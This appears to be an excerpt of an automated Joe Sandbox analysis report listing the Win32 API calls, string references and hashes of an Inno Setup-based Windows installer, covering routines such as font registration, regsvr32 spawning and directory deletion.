                                                      • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                      • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                    • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                    • API String ID: 884541143-1710247218
                                                    • Opcode ID: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                    • Instruction ID: 279d6da86f281c7a9c803d865f3c4407023b84140d9db6ac64499a617a38ab60
                                                    • Opcode Fuzzy Hash: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                    • Instruction Fuzzy Hash: 8A11E270B005147BDB01F6658D82BAE73ACDB45754F62827BB804A72C1DB7C9E028A1E
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                    • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                    • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                    • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                    • API String ID: 190572456-3516654456
                                                    • Opcode ID: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                    • Instruction ID: 76eb10cdb098e6f3740e4570fa0e0ca14f9d337f92906be3718b60d9f676c82f
                                                    • Opcode Fuzzy Hash: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                    • Instruction Fuzzy Hash: 800112B0D01B00DAE724DFB69DD572736A5ABA4306F10C13B9C49D62A2D77D0859DF2C
                                                    APIs
                                                    • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                    • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                    • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                    • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                    • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Color$StretchText
                                                    • String ID:
                                                    • API String ID: 2984075790-0
                                                    • Opcode ID: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                    • Instruction ID: f35f62ab74b2522f6310a7e8d9a92b24202350a16c816e0881424610f10e5e30
                                                    • Opcode Fuzzy Hash: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                    • Instruction Fuzzy Hash: 9F61C7B5A00105AFCB40EFADD985E9EB7F8EF08314B1085AAF518DB262C735ED408F58
                                                    APIs
                                                      • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseDirectoryHandleSystem
                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                    • API String ID: 2051275411-1862435767
                                                    • Opcode ID: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                    • Instruction ID: 56a02eb2220928eb4cb829bb83c6f501b915172eb664170f25c545f5d36e4a23
                                                    • Opcode Fuzzy Hash: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                    • Instruction Fuzzy Hash: 80413670A003086BDB10EFE5D842B8EB7B9AF44705F50407FA904BB297DF789A0D8B19
                                                    APIs
                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                    • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                    • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Text$Color$Draw$OffsetRect
                                                    • String ID:
                                                    • API String ID: 1005981011-0
                                                    • Opcode ID: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                    • Instruction ID: 3fa3981ec5684e07db84b004592342e93505d63b705e9416633fcf0049301179
                                                    • Opcode Fuzzy Hash: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                    • Instruction Fuzzy Hash: 6A21CEB46415047FC710FB2ACC8AE8BBBECDF19319B00457AB958EB392C678DE404668
                                                    APIs
                                                      • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                      • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                    • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                    • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                    • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                    • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                    Strings
                                                    • Deleting Uninstall data files., xrefs: 00495A07
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                    • String ID: Deleting Uninstall data files.
                                                    • API String ID: 1570157960-2568741658
                                                    • Opcode ID: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                    • Instruction ID: 8fd25edfc014547dd13852670f785c7791f766ba0082412c3ee421c8584d85d8
                                                    • Opcode Fuzzy Hash: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                    • Instruction Fuzzy Hash: 6D217371304610AFEB11E7A6ECC6B2736A8E758328F61453BB5019A1E2D67CAC04CB6C
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                    • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                    Strings
                                                    • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                    • Failed to open Fonts registry key., xrefs: 004700A1
                                                    • AddFontResource, xrefs: 004700D5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                    • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                    • API String ID: 955540645-649663873
                                                    • Opcode ID: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                    • Instruction ID: 9e1cacd5bb0885738b58fd2773111f6953d7784f445270ce1bd520dac8ad2ca8
                                                    • Opcode Fuzzy Hash: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                    • Instruction Fuzzy Hash: 2921B270741240BBDB10EA669C42FAA77DDCB54708F508437B904EB3C2DA7DAE02966D
                                                    APIs
                                                      • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                      • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                      • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                    • GetVersion.KERNEL32 ref: 00462C88
                                                    • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                    • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                    • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                    • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                    • String ID: Explorer
                                                    • API String ID: 2594429197-512347832
                                                    • Opcode ID: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                    • Instruction ID: fc1c968538dd14d686f90bdc81855b9701391525be241791f09fb78c6da7bbf1
                                                    • Opcode Fuzzy Hash: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                    • Instruction Fuzzy Hash: 7A21E7717407047AE720BB768D47F9A3698DB09708F40047FBA09EF2D3D9BC880186AD
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BD8,?,?,?,02192BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BD8,?,?,?,02192BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                    • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BD8,?,?,?,02192BD8), ref: 00477E60
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02192BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                    • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                    • API String ID: 2704155762-2318956294
                                                    • Opcode ID: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                    • Instruction ID: a9b895bb6ebf06323b616d37e9582929c99452ce9f0730db43ffa1519c083574
                                                    • Opcode Fuzzy Hash: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                    • Instruction Fuzzy Hash: D1014551788B0436E52031BA0C82FBB244C8F50729F508177BB5CEE2D3EABC9C0201AE
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                      • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                    Strings
                                                    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                    • Failed to strip read-only attribute., xrefs: 00459CC0
                                                    • Failed to delete directory (%d)., xrefs: 00459D88
                                                    • Deleting directory: %s, xrefs: 00459C7B
                                                    • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                    • Stripped read-only attribute., xrefs: 00459CB4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorFindLast
                                                    • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                    • API String ID: 754982922-1448842058
                                                    • Opcode ID: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                    • Instruction ID: cce1cab1201e8728e9bc38508445727295e1911ffe2e7292dd45cd7f335e186b
                                                    • Opcode Fuzzy Hash: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                    • Instruction Fuzzy Hash: F9418230A04259DACB04EB6988013AE76F55F4930AF55857FAC0597393D7BC8E0D879A
                                                    APIs
                                                    • GetCapture.USER32 ref: 00422E9C
                                                    • GetCapture.USER32 ref: 00422EAB
                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                    • ReleaseCapture.USER32 ref: 00422EB6
                                                    • GetActiveWindow.USER32 ref: 00422EC5
                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                    • GetActiveWindow.USER32 ref: 00422FB7
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                    • String ID:
                                                    • API String ID: 862346643-0
                                                    • Opcode ID: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                    • Instruction ID: a831bf89ec3617aa4b81e8a61b28cb02c358a8e939ae68eb352e359643dafe13
                                                    • Opcode Fuzzy Hash: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                    • Instruction Fuzzy Hash: E1414070B00245AFDB10EF69DA46B9E77F1EF48304F5140BAF404AB2A2D7B89E40DB59
                                                    APIs
                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                    • GetActiveWindow.USER32 ref: 0042F2D2
                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                    • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$ActiveLong$Message
                                                    • String ID:
                                                    • API String ID: 2785966331-0
                                                    • Opcode ID: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                    • Instruction ID: 9696dc9395d24dec9abacdc10881687288e082ae8fcf9a6a48756090996bfad8
                                                    • Opcode Fuzzy Hash: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                    • Instruction Fuzzy Hash: A431A171A00714AFDB01EFB9DC52E6E7BF8EB09714B9148BAF804E7291D7389D10CA58
                                                    APIs
                                                    • 73A1A570.USER32(00000000), ref: 00429482
                                                    • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                      • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                    • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                    • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                    • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                    • String ID:
                                                    • API String ID: 361401722-0
                                                    • Opcode ID: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                    • Instruction ID: 79023d5d76270fc5b80a90959683f08304bbfc9b3a68a0d1de019d9dda53e89a
                                                    • Opcode Fuzzy Hash: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                    • Instruction Fuzzy Hash: FE01C0A17087503BE311767A9CC6F6F65C8DB44358F84043BF686D63D3D9AC9C81876A
                                                    APIs
                                                    • 73A1A570.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                    • 73A24620.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                    • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                    • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                    • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                    • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                    • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ObjectStock$A24620A480A570IconLoad
